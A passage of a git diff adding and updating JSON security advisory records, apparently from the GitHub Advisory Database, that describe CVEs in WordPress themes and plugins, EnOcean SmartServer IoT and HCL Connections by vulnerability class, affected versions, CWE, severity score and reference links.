"github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json b/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json new file mode 100644 index 0000000000000..a388ec49baa9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5q2-22j2-xvp3", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69398" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Plank plank allows PHP Local File Inclusion.This issue affects Plank: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69398" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/plank/vulnerability/wordpress-plank-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json b/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json new file mode 100644 index 0000000000000..9bd6097cd90a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6m3-2f65-r5x7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-20761" + ], + "details": "A vulnerability exists in EnOcean SmartServer IoT version 4.60.009 and \nprior, which would allow remote attackers, in the LON IP-852 management \nmessages, to send specially crafted IP-852 messages resulting in \narbitrary OS command execution on the device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20761" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/DrftSSIoT/pages/1475410/SmartServer+IoT+Release+Notes#Current-Stable-Release" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/IEC/pages/288063529/Enhancing+Security" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-01.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json b/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json new file mode 100644 index 0000000000000..fc981e1d65c82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6x7-wpp7-g26g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68853" + ], + "details": "Deserialization of Untrusted Data vulnerability in Kleor Contact Manager contact-manager allows Object Injection.This issue affects Contact Manager: from n/a through <= 9.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68853" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/contact-manager/vulnerability/wordpress-contact-manager-plugin-9-0-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json new file mode 100644 index 0000000000000..9f36ac3497bf5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v754-wvf3-33xx", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22372" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Isida isida allows PHP Local File Inclusion.This issue affects Isida: from n/a through <= 1.4.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22372" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/isida/vulnerability/wordpress-isida-theme-1-4-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json b/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json new file mode 100644 index 0000000000000..1c97a2bfac569 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v76h-ch32-xfcr", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22365" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Soleng soleng allows PHP Local File Inclusion.This issue affects Soleng: from n/a through <= 1.0.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22365" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soleng/vulnerability/wordpress-soleng-theme-1-0-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json new file mode 100644 index 0000000000000..fff849fc5b48c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v859-79r4-4vv5", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24959" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24959" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-3-0-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json b/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json new file mode 100644 index 0000000000000..999f621f271de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9wq-4qj2-xvh4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69396" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Splendour splendour allows PHP Local File Inclusion.This issue affects Splendour: from n/a through <= 1.23.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69396" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/splendour/vulnerability/wordpress-splendour-theme-1-23-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json b/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json new file mode 100644 index 0000000000000..7bf08f1488cd2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf3m-rggr-vh64", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-43228" + ], + "details": "Missing Authorization vulnerability in SecuPress SecuPress Free secupress.This issue affects SecuPress Free: from n/a through <= 2.2.5.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43228" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/secupress/vulnerability/wordpress-secupress-free-plugin-2-2-5-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json index 797cab9aa94ab..7985e87ba666c 100644 --- a/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json +++ b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vf83-6p8j-54f5", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27055" ], "details": "Missing Authorization vulnerability in PenciDesign Penci AI SmartContent Creator penci-ai allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Penci AI SmartContent Creator: from n/a through <= 2.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:26Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json b/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json new file mode 100644 index 0000000000000..dac66bfd03145 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg7x-9fx9-rhfv", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-52603" + ], + "details": "HCL Connections is vulnerable to information disclosure. In a very specific user navigation scenario, this could allow a user to obtain limited information when a single piece of internal metadata is returned in the browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52603" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124242" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-213" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json b/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json new file mode 100644 index 0000000000000..ab9a1a0019539 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhgp-3x24-vh98", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69295" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Coven Core coven-core allows Blind SQL Injection.This issue affects Coven Core: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69295" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/coven-core/vulnerability/wordpress-coven-core-plugin-1-3-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json new file mode 100644 index 0000000000000..e3a4eb2776bd6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjvc-9fxm-2xw8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69368" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes SOHO - Photography WordPress Theme soho allows DOM-Based XSS.This issue affects SOHO - Photography WordPress Theme: from n/a through <= 3.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soho/vulnerability/wordpress-soho-photography-wordpress-theme-theme-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json new file mode 100644 index 0000000000000..cc0af4ab5b99c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmwq-q997-3c46", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22362" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Photolia photolia allows PHP Local File Inclusion.This issue affects Photolia: from n/a through <= 1.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22362" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/photolia/vulnerability/wordpress-photolia-theme-1-0-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json b/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json new file mode 100644 index 0000000000000..cc8061342f1f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp2m-r3pp-p859", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69404" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeREX Extreme Store extremestore allows Object Injection.This issue affects Extreme Store: from n/a through <= 1.5.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69404" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/extremestore/vulnerability/wordpress-extreme-store-theme-1-5-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json new file mode 100644 index 0000000000000..bf5b830a16403 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vph5-6p6f-8xpf", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68031" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in faraz sms افزونه پیامک حرفه ای فراز اس ام اس farazsms allows Reflected XSS.This issue affects افزونه پیامک حرفه ای فراز اس ام اس: from n/a through <= 2.7.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68031" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/farazsms/vulnerability/wordpress-fzonh-m-hrfh-fr-z-s-m-s-plugin-2-7-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json index f6affccd03956..d2d8bcdb5820e 100644 --- a/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json +++ b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vv37-5fmc-w362", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25307" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore Core et-core-plugin allows DOM-Based XSS.This issue affects XStore Core: from n/a through < 5.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json b/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json new file mode 100644 index 0000000000000..e9dfb8c5d9582 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vxf7-pjj6-wh93", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67979" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in WesternDeal WPForms Google Sheet Connector gsheetconnector-wpforms allows Code Injection.This issue affects WPForms Google Sheet Connector: from n/a through <= 4.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67979" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/gsheetconnector-wpforms/vulnerability/wordpress-wpforms-google-sheet-connector-plugin-4-0-1-remote-code-execution-rce-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json new file mode 100644 index 0000000000000..9cb37fd2b1c65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w246-2vcp-75v8", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-27503" + ], + "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in admin/log.php via the search query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing attacker-supplied JavaScript to execute in the administrator's browser. This can enable session theft, administrative action forgery, or other browser-based compromise in the context of an admin user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27503" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/log.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-admin-log-php-search-reflected-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json new file mode 100644 index 0000000000000..e9d68aa6beda3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2hw-vq92-cm3x", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69380" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69380" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-upload-files-anywhere/vulnerability/wordpress-upload-files-anywhere-plugin-2-8-arbitrary-file-download-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json new file mode 100644 index 0000000000000..a2c559792d9ce --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7wv-fvvq-ppfp", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68852" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webmuehle Court Reservation court-reservation allows Reflected XSS.This issue affects Court Reservation: from n/a through <= 1.10.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68852" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/court-reservation/vulnerability/wordpress-court-reservation-manage-your-court-bookings-online-plugin-1-10-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json new file mode 100644 index 0000000000000..b108256ae4364 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json 
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wf36-8q2p-m2xg",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-53231"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevstudio Easy Taxonomy Images easy-taxonomy-images allows Stored XSS.This issue affects Easy Taxonomy Images: from n/a through <= 1.0.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53231"
+ },
+ {
